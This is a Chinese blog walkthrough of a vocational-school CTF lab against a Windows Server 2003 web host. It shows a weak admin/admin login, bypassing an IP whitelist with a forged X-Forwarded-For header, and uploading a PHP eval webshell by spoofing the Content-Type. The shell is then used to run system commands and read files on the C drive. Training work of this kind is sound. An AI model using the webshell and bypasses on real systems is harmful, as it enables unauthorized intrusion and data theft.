中职网络安全web安全应用match_win03-3-1

任务环境说明:

服务器场景:match_win03-3-1

服务器场景操作系统:windows Server 2003

出环境,QQ:1968384113

1.使用渗透机Kali Linux,登录靶机HTTP服务后台管理页面,并将后台管理页面代码中Flag值提交。

使用nmap扫描工具扫描靶机,查看端口开放情况

80端口是正常开放的,我们使用web网站目录爆破工具dirb扫描靶机,找到网站后台管理网址

访问后台网址后,使用弱口令账号密码登录:admin-admin

看到回显,我们的ip地址不在白名单中,所以我们要使用burpsuite工具修改IP地址,修改成本地ip

使用burpsuite拦截,然后添加X-Forwarded-For:127.0.0.1

这样我们就登录进去了,这题要我们将后台管理页面代码中Flag值提交,现在我们已经进入后台页面,查看源代码就可以找到flag

Flag:Oauth0

2.使用渗透机Kali Linux,访问靶机Http服务,使用文本反馈功能上传PHP一句话木马(shell.php),并将上传后提示唯一一行JavaScript代码作为Flag值提交。

访问http://靶机ip,点击问题反馈,再点击BUG反馈(文档方式)

进来之后是一个上传文档的地方,在这里上传一句话木马

在桌面创建一个shell.php文件,文件内容为<?php @eval($_GET["cmd"]);?>

将文件提交的时候使用burpsuite拦截,然后发送到重放器,在重放器发送之后,得到flag

Flag:window.open('upload/shell.php');

3.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马获取靶机C盘根目录下flag.txt中内容,并将获取文件函数作为Flag值提交。

在“代理”中,需要修改文件属性,不然上传不上去,靶机进制上传php文件,我们把php文件属性修改成text/plain的txt文件属性,再放行就上传成功了

上传成功后,访问http://靶机ip/upload/shell.php

下一步就是要利用这个木马,获取C盘目录下的flag文件

在shell.php后面添加?cmd=echo file_get_contents('c:\\flag.txt');

Flag:file_get_contents

4.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马获取靶机C盘根目录下flag.txt中的内容,并将文本中的内容作为Flag值提交。

根据上一题,Flag已经找到了

Flag:hel10wOrld

5.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马找到C盘根目录下唯一一个png文件,并提交图片源文件中的Flag值。

利用一句话木马,列出C盘根目录的文件。在shell.php后面添加?cmd=system('dir c:\\');

这样我们就知道C盘根目录下png图片的名称了,只需要使用type命令查看图片内容

在shell.php后面添加?cmd=system('type c:\\geforce0.png');

在底下找到flag

Flag:Ia98a8fA9a

  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值